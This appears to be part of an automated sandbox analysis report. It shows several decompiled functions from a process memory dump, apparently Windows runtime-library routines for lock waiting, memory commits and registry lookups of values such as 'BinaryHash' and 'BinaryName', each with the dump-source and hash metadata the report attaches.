                                                    				}
                                                    				_v20 = _v20 & 0x00000000;
                                                    				if(_t58 != _t103) {
                                                    					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                    				}
                                                    				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                    				_t88 = _v16;
                                                    				_v28 = _t104;
                                                    				L9:
                                                    				while(1) {
                                                    					if(E04B67D50() != 0) {
                                                    						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                    					} else {
                                                    						_t62 = 0x7ffe0382;
                                                    					}
                                                    					if( *_t62 != 0) {
                                                    						_t63 =  *[fs:0x30];
                                                    						__eflags = _t63[0x240] & 0x00000002;
                                                    						if((_t63[0x240] & 0x00000002) != 0) {
                                                    							_t93 = _t109;
                                                    							E04BDFE87(_t93);
                                                    						}
                                                    					}
                                                    					if(_t104 != 0xffffffff) {
                                                    						_push(_t88);
                                                    						_push(0);
                                                    						_push(_t104);
                                                    						_t64 = E04B89520();
                                                    						goto L15;
                                                    					} else {
                                                    						while(1) {
                                                    							_t97 =  &_v8;
                                                    							_t64 = E04B7E18B(_t109 + 4, _t97, 4, _t88, 0);
                                                    							if(_t64 == 0x102) {
                                                    								break;
                                                    							}
                                                    							_t93 =  *(_t109 + 4);
                                                    							_v8 = _t93;
                                                    							if((_t93 & 0x00000002) != 0) {
                                                    								continue;
                                                    							}
                                                    							L15:
                                                    							if(_t64 == 0x102) {
                                                    								break;
                                                    							}
                                                    							_t89 = _v24;
                                                    							if(_t64 < 0) {
                                                    								L04B9DF30(_t93, _t97, _t64);
                                                    								_push(_t93);
                                                    								_t98 = _t97 | 0xffffffff;
                                                    								__eflags =  *0x4c36901;
                                                    								_push(_t109);
                                                    								_v52 = _t98;
                                                    								if( *0x4c36901 != 0) {
                                                    									_push(0);
                                                    									_push(1);
                                                    									_push(0);
                                                    									_push(0x100003);
                                                    									_push( &_v12);
                                                    									_t72 = E04B89980();
                                                    									__eflags = _t72;
                                                    									if(_t72 < 0) {
                                                    										_v12 = _t98 | 0xffffffff;
                                                    									}
                                                    								}
                                                    								asm("lock cmpxchg [ecx], edx");
                                                    								_t111 = 0;
                                                    								__eflags = 0;
                                                    								if(0 != 0) {
                                                    									__eflags = _v12 - 0xffffffff;
                                                    									if(_v12 != 0xffffffff) {
                                                    										_push(_v12);
                                                    										E04B895D0();
                                                    									}
                                                    								} else {
                                                    									_t111 = _v12;
                                                    								}
                                                    								return _t111;
                                                    							} else {
                                                    								if(_t89 != 0) {
                                                    									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                    									_t77 = E04B67D50();
                                                    									__eflags = _t77;
                                                    									if(_t77 == 0) {
                                                    										_t64 = 0x7ffe0384;
                                                    									} else {
                                                    										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                    									}
                                                    									__eflags =  *_t64;
                                                    									if( *_t64 != 0) {
                                                    										_t64 =  *[fs:0x30];
                                                    										__eflags = _t64[0x240] & 0x00000004;
                                                    										if((_t64[0x240] & 0x00000004) != 0) {
                                                    											_t78 = E04B67D50();
                                                    											__eflags = _t78;
                                                    											if(_t78 == 0) {
                                                    												_t64 = 0x7ffe0385;
                                                    											} else {
                                                    												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                    											}
                                                    											__eflags =  *_t64 & 0x00000020;
                                                    											if(( *_t64 & 0x00000020) != 0) {
                                                    												_t64 = E04BC7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                    											}
                                                    										}
                                                    									}
                                                    								}
                                                    								return _t64;
                                                    							}
                                                    						}
                                                    						_t97 = _t88;
                                                    						_t93 = _t109;
                                                    						E04BDFDDA(_t97, _v12);
                                                    						_t105 =  *_t109;
                                                    						_t67 = _v12 + 1;
                                                    						_v12 = _t67;
                                                    						__eflags = _t105 - 0xffffffff;
                                                    						if(_t105 == 0xffffffff) {
                                                    							_t106 = 0;
                                                    							__eflags = 0;
                                                    						} else {
                                                    							_t106 =  *(_t105 + 0x14);
                                                    						}
                                                    						__eflags = _t67 - 2;
                                                    						if(_t67 > 2) {
                                                    							__eflags = _t109 - 0x4c35350;
                                                    							if(_t109 != 0x4c35350) {
                                                    								__eflags = _t106 - _v20;
                                                    								if(__eflags == 0) {
                                                    									_t93 = _t109;
                                                    									E04BDFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                    								}
                                                    							}
                                                    						}
                                                    						_push("RTL: Re-Waiting\n");
                                                    						_push(0);
                                                    						_push(0x65);
                                                    						_v20 = _t106;
                                                    						E04BD5720();
                                                    						_t104 = _v28;
                                                    						_t116 = _t116 + 0xc;
                                                    						continue;
                                                    					}
                                                    				}
                                                    			}





































                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Re-Waiting
                                                    • API String ID: 0-316354757
                                                    • Opcode ID: 8404fa1235f54511eaad5ccad0b004fa34c76d5fed1eab88fc5d8479d6fa393d
                                                    • Instruction ID: c0e337bc88822c857d8f829694a149f506d9aba750a548089cad572d78c23efe
                                                    • Opcode Fuzzy Hash: 8404fa1235f54511eaad5ccad0b004fa34c76d5fed1eab88fc5d8479d6fa393d
                                                    • Instruction Fuzzy Hash: DB61E171A00604ABEB25DF68C880B7E77F5EB84768F144AE9E411972C0DB74BE01B791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 80%
                                                    			E04C10EA5(void* __ecx, void* __edx) {
                                                    				signed int _v20;
                                                    				char _v24;
                                                    				intOrPtr _v28;
                                                    				unsigned int _v32;
                                                    				signed int _v36;
                                                    				intOrPtr _v40;
                                                    				char _v44;
                                                    				intOrPtr _v64;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				signed int _t58;
                                                    				unsigned int _t60;
                                                    				intOrPtr _t62;
                                                    				char* _t67;
                                                    				char* _t69;
                                                    				void* _t80;
                                                    				void* _t83;
                                                    				intOrPtr _t93;
                                                    				intOrPtr _t115;
                                                    				char _t117;
                                                    				void* _t120;
                                                    
                                                    				_t83 = __edx;
                                                    				_t117 = 0;
                                                    				_t120 = __ecx;
                                                    				_v44 = 0;
                                                    				if(E04C0FF69(__ecx,  &_v44,  &_v32) < 0) {
                                                    					L24:
                                                    					_t109 = _v44;
                                                    					if(_v44 != 0) {
                                                    						E04C11074(_t83, _t120, _t109, _t117, _t117);
                                                    					}
                                                    					L26:
                                                    					return _t117;
                                                    				}
                                                    				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                    				_t5 = _t83 + 1; // 0x1
                                                    				_v36 = _t5 << 0xc;
                                                    				_v40 = _t93;
                                                    				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                    				asm("sbb ebx, ebx");
                                                    				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                    				if(_t58 != 0) {
                                                    					_push(0);
                                                    					_push(0x14);
                                                    					_push( &_v24);
                                                    					_push(3);
                                                    					_push(_t93);
                                                    					_push(0xffffffff);
                                                    					_t80 = E04B89730();
                                                    					_t115 = _v64;
                                                    					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                    						_push(_t93);
                                                    						E04C0A80D(_t115, 1, _v20, _t117);
                                                    						_t83 = 4;
                                                    					}
                                                    				}
                                                    				if(E04C0A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                    					goto L24;
                                                    				}
                                                    				_t60 = _v32;
                                                    				_t97 = (_t60 != 0x100000) + 1;
                                                    				_t83 = (_v44 -  *0x4c38b04 >> 0x14) + (_v44 -  *0x4c38b04 >> 0x14);
                                                    				_v28 = (_t60 != 0x100000) + 1;
                                                    				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                    				_v40 = _t62;
                                                    				if(_t83 >= _t62) {
                                                    					L10:
                                                    					asm("lock xadd [eax], ecx");
                                                    					asm("lock xadd [eax], ecx");
                                                    					if(E04B67D50() == 0) {
                                                    						_t67 = 0x7ffe0380;
                                                    					} else {
                                                    						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                    					}
                                                    					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                    						E04C0138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                    					}
                                                    					if(E04B67D50() == 0) {
                                                    						_t69 = 0x7ffe0388;
                                                    					} else {
                                                    						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                    					}
                                                    					if( *_t69 != 0) {
                                                    						E04BFFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                    					}
                                                    					if(( *0x4c38724 & 0x00000008) != 0) {
                                                    						E04C052F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                    					}
                                                    					_t117 = _v44;
                                                    					goto L26;
                                                    				}
                                                    				while(E04C115B5(0x4c38ae4, _t83, _t97, _t97) >= 0) {
                                                    					_t97 = _v28;
                                                    					_t83 = _t83 + 2;
                                                    					if(_t83 < _v40) {
                                                    						continue;
                                                    					}
                                                    					goto L10;
                                                    				}
                                                    				goto L24;
                                                    			}

























                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `
                                                    • API String ID: 0-2679148245
                                                    • Opcode ID: ab7937efd89e01b0f3bf3341e9b7622c42fc3faa61ba6a2248b25016d0954303
                                                    • Instruction ID: 05aeda93b1767e126480da098cc9851055cb329eda7658b26236e10feb0d3e69
                                                    • Opcode Fuzzy Hash: ab7937efd89e01b0f3bf3341e9b7622c42fc3faa61ba6a2248b25016d0954303
                                                    • Instruction Fuzzy Hash: 4F51E2702043419FE324DF29D884B2BB7E6EBC9308F08492DF586876A0DB75F945DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 75%
                                                    			E04B7F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr _v16;
                                                    				char* _v20;
                                                    				intOrPtr _v24;
                                                    				char _v28;
                                                    				intOrPtr _v32;
                                                    				char _v36;
                                                    				char _v44;
                                                    				char _v52;
                                                    				intOrPtr _v56;
                                                    				char _v60;
                                                    				intOrPtr _v72;
                                                    				void* _t51;
                                                    				void* _t58;
                                                    				signed short _t82;
                                                    				short _t84;
                                                    				signed int _t91;
                                                    				signed int _t100;
                                                    				signed short* _t103;
                                                    				void* _t108;
                                                    				intOrPtr* _t109;
                                                    
                                                    				_t103 = __ecx;
                                                    				_t82 = __edx;
                                                    				_t51 = E04B64120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                    				if(_t51 >= 0) {
                                                    					_push(0x21);
                                                    					_push(3);
                                                    					_v56 =  *0x7ffe02dc;
                                                    					_v20 =  &_v52;
                                                    					_push( &_v44);
                                                    					_v28 = 0x18;
                                                    					_push( &_v28);
                                                    					_push(0x100020);
                                                    					_v24 = 0;
                                                    					_push( &_v60);
                                                    					_v16 = 0x40;
                                                    					_v12 = 0;
                                                    					_v8 = 0;
                                                    					_t58 = E04B89830();
                                                    					_t87 =  *[fs:0x30];
                                                    					_t108 = _t58;
                                                    					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                    					if(_t108 < 0) {
                                                    						L11:
                                                    						_t51 = _t108;
                                                    					} else {
                                                    						_push(4);
                                                    						_push(8);
                                                    						_push( &_v36);
                                                    						_push( &_v44);
                                                    						_push(_v60);
                                                    						_t108 = E04B89990();
                                                    						if(_t108 < 0) {
                                                    							L10:
                                                    							_push(_v60);
                                                    							E04B895D0();
                                                    							goto L11;
                                                    						} else {
                                                    							_t109 = L04B64620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                    							if(_t109 == 0) {
                                                    								_t108 = 0xc0000017;
                                                    								goto L10;
                                                    							} else {
                                                    								_t21 = _t109 + 0x18; // 0x18
                                                    								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                    								 *_t109 = 1;
                                                    								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                    								 *(_t109 + 0xe) = _t82;
                                                    								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                    								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                    								E04B8F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                    								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                    								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                    								_t91 =  *_t103 & 0x0000ffff;
                                                    								_t100 = _t91 & 0xfffffffe;
                                                    								_t84 = 0x5c;
                                                    								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                    									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                    										_push(_v60);
                                                    										E04B895D0();
                                                    										L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                    										_t51 = 0xc0000106;
                                                    									} else {
                                                    										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                    										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                    										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                    										goto L5;
                                                    									}
                                                    								} else {
                                                    									L5:
                                                    									 *_a4 = _t109;
                                                    									_t51 = 0;
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t51;
                                                    			}

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                    • Instruction ID: 7c8f9e665360e2f8d138008d2594da26ec01139578731fa53be133ad9f85537f
                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                    • Instruction Fuzzy Hash: 7551AE716047109FD320DF18C840A6BBBF8FF48754F00896DF9A687690E7B4E915CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 75%
                                                    			E04BC3540(intOrPtr _a4) {
                                                    				signed int _v12;
                                                    				intOrPtr _v88;
                                                    				intOrPtr _v92;
                                                    				char _v96;
                                                    				char _v352;
                                                    				char _v1072;
                                                    				intOrPtr _v1140;
                                                    				intOrPtr _v1148;
                                                    				char _v1152;
                                                    				char _v1156;
                                                    				char _v1160;
                                                    				char _v1164;
                                                    				char _v1168;
                                                    				char* _v1172;
                                                    				short _v1174;
                                                    				char _v1176;
                                                    				char _v1180;
                                                    				char _v1192;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				short _t41;
                                                    				short _t42;
                                                    				intOrPtr _t80;
                                                    				intOrPtr _t81;
                                                    				signed int _t82;
                                                    				void* _t83;
                                                    
                                                    				_v12 =  *0x4c3d360 ^ _t82;
                                                    				_t41 = 0x14;
                                                    				_v1176 = _t41;
                                                    				_t42 = 0x16;
                                                    				_v1174 = _t42;
                                                    				_v1164 = 0x100;
                                                    				_v1172 = L"BinaryHash";
                                                    				_t81 = E04B80BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                    				if(_t81 < 0) {
                                                    					L11:
                                                    					_t75 = _t81;
                                                    					E04BC3706(0, _t81, _t79, _t80);
                                                    					L12:
                                                    					if(_a4 != 0xc000047f) {
                                                    						E04B8FA60( &_v1152, 0, 0x50);
                                                    						_v1152 = 0x60c201e;
                                                    						_v1148 = 1;
                                                    						_v1140 = E04BC3540;
                                                    						E04B8FA60( &_v1072, 0, 0x2cc);
                                                    						_push( &_v1072);
                                                    						E04B9DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                    						E04BD0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                    						_push(_v1152);
                                                    						_push(0xffffffff);
                                                    						E04B897C0();
                                                    					}
                                                    					return E04B8B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                    				}
                                                    				_t79 =  &_v352;
                                                    				_t81 = E04BC3971(0, _a4,  &_v352,  &_v1156);
                                                    				if(_t81 < 0) {
                                                    					goto L11;
                                                    				}
                                                    				_t75 = _v1156;
                                                    				_t79 =  &_v1160;
                                                    				_t81 = E04BC3884(_v1156,  &_v1160,  &_v1168);
                                                    				if(_t81 >= 0) {
                                                    					_t80 = _v1160;
                                                    					E04B8FA60( &_v96, 0, 0x50);
                                                    					_t83 = _t83 + 0xc;
                                                    					_push( &_v1180);
                                                    					_push(0x50);
                                                    					_push( &_v96);
                                                    					_push(2);
                                                    					_push( &_v1176);
                                                    					_push(_v1156);
                                                    					_t81 = E04B89650();
                                                    					if(_t81 >= 0) {
                                                    						if(_v92 != 3 || _v88 == 0) {
                                                    							_t81 = 0xc000090b;
                                                    						}
                                                    						if(_t81 >= 0) {
                                                    							_t75 = _a4;
                                                    							_t79 =  &_v352;
                                                    							E04BC3787(_a4,  &_v352, _t80);
                                                    						}
                                                    					}
                                                    					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                    				}
                                                    				_push(_v1156);
                                                    				E04B895D0();
                                                    				if(_t81 >= 0) {
                                                    					goto L12;
                                                    				} else {
                                                    					goto L11;
                                                    				}
                                                    			}

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: BinaryHash
                                                    • API String ID: 2994545307-2202222882
                                                    • Opcode ID: a2cb327928e69cde024cae17d1b1bb1913ef1623034f83177c82b3d461ff8f1b
                                                    • Instruction ID: 0412f484d6dbab9d8c0f509a631ad732788f4211d5f43f9b371e20460933f481
                                                    • Opcode Fuzzy Hash: a2cb327928e69cde024cae17d1b1bb1913ef1623034f83177c82b3d461ff8f1b
                                                    • Instruction Fuzzy Hash: 634137B1D0452C9BEF21DA50CC80FEEB77C9B44718F4085E9AA19A7140DB30AE88CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 71%
                                                    			E04C105AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                    				signed int _v20;
                                                    				char _v24;
                                                    				signed int _v28;
                                                    				char _v32;
                                                    				signed int _v36;
                                                    				intOrPtr _v40;
                                                    				void* __ebx;
                                                    				void* _t35;
                                                    				signed int _t42;
                                                    				char* _t48;
                                                    				signed int _t59;
                                                    				signed char _t61;
                                                    				signed int* _t79;
                                                    				void* _t88;
                                                    
                                                    				_v28 = __edx;
                                                    				_t79 = __ecx;
                                                    				if(E04C107DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                    					L13:
                                                    					_t35 = 0;
                                                    					L14:
                                                    					return _t35;
                                                    				}
                                                    				_t61 = __ecx[1];
                                                    				_t59 = __ecx[0xf];
                                                    				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                    				_v36 = _a8 << 0xc;
                                                    				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                    				asm("sbb esi, esi");
                                                    				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                    				if(_t42 != 0) {
                                                    					_push(0);
                                                    					_push(0x14);
                                                    					_push( &_v24);
                                                    					_push(3);
                                                    					_push(_t59);
                                                    					_push(0xffffffff);
                                                    					if(E04B89730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                    						_push(_t61);
                                                    						E04C0A80D(_t59, 1, _v20, 0);
                                                    						_t88 = 4;
                                                    					}
                                                    				}
                                                    				_t35 = E04C0A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                    				if(_t35 < 0) {
                                                    					goto L14;
                                                    				}
                                                    				E04C11293(_t79, _v40, E04C107DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                    				if(E04B67D50() == 0) {
                                                    					_t48 = 0x7ffe0380;
                                                    				} else {
                                                    					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                    				}
                                                    				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                    					E04C0138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                    				}
                                                    				goto L13;
                                                    			}

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `
                                                    • API String ID: 0-2679148245
                                                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                    • Instruction ID: d7047363919048e363fb66940f775d6003dd3c0d23a101948180f6780be404e2
                                                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                    • Instruction Fuzzy Hash: CE31E232304305ABE720DE26CC45F9A77DAAB85758F044229FD54EB690DA70FA44D791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 72%
                                                    			E04BC3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                    				char _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr* _v16;
                                                    				char* _v20;
                                                    				short _v22;
                                                    				char _v24;
                                                    				intOrPtr _t38;
                                                    				short _t40;
                                                    				short _t41;
                                                    				void* _t44;
                                                    				intOrPtr _t47;
                                                    				void* _t48;
                                                    
                                                    				_v16 = __edx;
                                                    				_t40 = 0x14;
                                                    				_v24 = _t40;
                                                    				_t41 = 0x16;
                                                    				_v22 = _t41;
                                                    				_t38 = 0;
                                                    				_v12 = __ecx;
                                                    				_push( &_v8);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(2);
                                                    				_t43 =  &_v24;
                                                    				_v20 = L"BinaryName";
                                                    				_push( &_v24);
                                                    				_push(__ecx);
                                                    				_t47 = 0;
                                                    				_t48 = E04B89650();
                                                    				if(_t48 >= 0) {
                                                    					_t48 = 0xc000090b;
                                                    				}
                                                    				if(_t48 != 0xc0000023) {
                                                    					_t44 = 0;
                                                    					L13:
                                                    					if(_t48 < 0) {
                                                    						L16:
                                                    						if(_t47 != 0) {
                                                    							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                    						}
                                                    						L18:
                                                    						return _t48;
                                                    					}
                                                    					 *_v16 = _t38;
                                                    					 *_a4 = _t47;
                                                    					goto L18;
                                                    				}
                                                    				_t47 = L04B64620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                    				if(_t47 != 0) {
                                                    					_push( &_v8);
                                                    					_push(_v8);
                                                    					_push(_t47);
                                                    					_push(2);
                                                    					_push( &_v24);
                                                    					_push(_v12);
                                                    					_t48 = E04B89650();
                                                    					if(_t48 < 0) {
                                                    						_t44 = 0;
                                                    						goto L16;
                                                    					}
                                                    					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                    						_t48 = 0xc000090b;
                                                    					}
                                                    					_t44 = 0;
                                                    					if(_t48 < 0) {
                                                    						goto L16;
                                                    					} else {
                                                    						_t17 = _t47 + 0xc; // 0xc
                                                    						_t38 = _t17;
                                                    						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                    							_t48 = 0xc000090b;
                                                    						}
                                                    						goto L13;
                                                    					}
                                                    				}
                                                    				_t48 = _t48 + 0xfffffff4;
                                                    				goto L18;
                                                    			}
















                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: BinaryName
                                                    • API String ID: 2994545307-215506332
                                                    • Opcode ID: 2186af19bfb2ebc376c75c000ebb093e9f3f976b6fa6ca0d18b2309139ee5f02
                                                    • Instruction ID: 20f0fdea54fbf3a3d50d8895e6cd6001a823092a655e7ea8ac7786d3e4c69e00
                                                    • Opcode Fuzzy Hash: 2186af19bfb2ebc376c75c000ebb093e9f3f976b6fa6ca0d18b2309139ee5f02
                                                    • Instruction Fuzzy Hash: F931F472900519EFEB25DA58C985D7BB7B4EB90720F0181ADED16A7690D670FE00C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 33%
                                                    			E04B7D294(void* __ecx, char __edx, void* __eflags) {
                                                    				signed int _v8;
                                                    				char _v52;
                                                    				signed int _v56;
                                                    				signed int _v60;
                                                    				intOrPtr _v64;
                                                    				char* _v68;
                                                    				intOrPtr _v72;
                                                    				char _v76;
                                                    				signed int _v84;
                                                    				intOrPtr _v88;
                                                    				char _v92;
                                                    				intOrPtr _v96;
                                                    				intOrPtr _v100;
                                                    				char _v104;
                                                    				char _v105;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t35;
                                                    				char _t38;
                                                    				signed int _t40;
                                                    				signed int _t44;
                                                    				signed int _t52;
                                                    				void* _t53;
                                                    				void* _t55;
                                                    				void* _t61;
                                                    				intOrPtr _t62;
                                                    				void* _t64;
                                                    				signed int _t65;
                                                    				signed int _t66;
                                                    
                                                    				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                    				_v8 =  *0x4c3d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                    				_v105 = __edx;
                                                    				_push( &_v92);
                                                    				_t52 = 0;
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push( &_v104);
                                                    				_push(0);
                                                    				_t59 = __ecx;
                                                    				_t55 = 2;
                                                    				if(E04B64120(_t55, __ecx) < 0) {
                                                    					_t35 = 0;
                                                    					L8:
                                                    					_pop(_t61);
                                                    					_pop(_t64);
                                                    					_pop(_t53);
                                                    					return E04B8B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                    				}
                                                    				_v96 = _v100;
                                                    				_t38 = _v92;
                                                    				if(_t38 != 0) {
                                                    					_v104 = _t38;
                                                    					_v100 = _v88;
                                                    					_t40 = _v84;
                                                    				} else {
                                                    					_t40 = 0;
                                                    				}
                                                    				_v72 = _t40;
                                                    				_v68 =  &_v104;
                                                    				_push( &_v52);
                                                    				_v76 = 0x18;
                                                    				_push( &_v76);
                                                    				_v64 = 0x40;
                                                    				_v60 = _t52;
                                                    				_v56 = _t52;
                                                    				_t44 = E04B898D0();
                                                    				_t62 = _v88;
                                                    				_t65 = _t44;
                                                    				if(_t62 != 0) {
                                                    					asm("lock xadd [edi], eax");
                                                    					if((_t44 | 0xffffffff) != 0) {
                                                    						goto L4;
                                                    					}
                                                    					_push( *((intOrPtr*)(_t62 + 4)));
                                                    					E04B895D0();
                                                    					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                    					goto L4;
                                                    				} else {
                                                    					L4:
                                                    					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                    					if(_t65 >= 0) {
                                                    						_t52 = 1;
                                                    					} else {
                                                    						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                    							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                    						}
                                                    					}
                                                    					_t35 = _t52;
                                                    					goto L8;
                                                    				}
                                                    			}


































                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
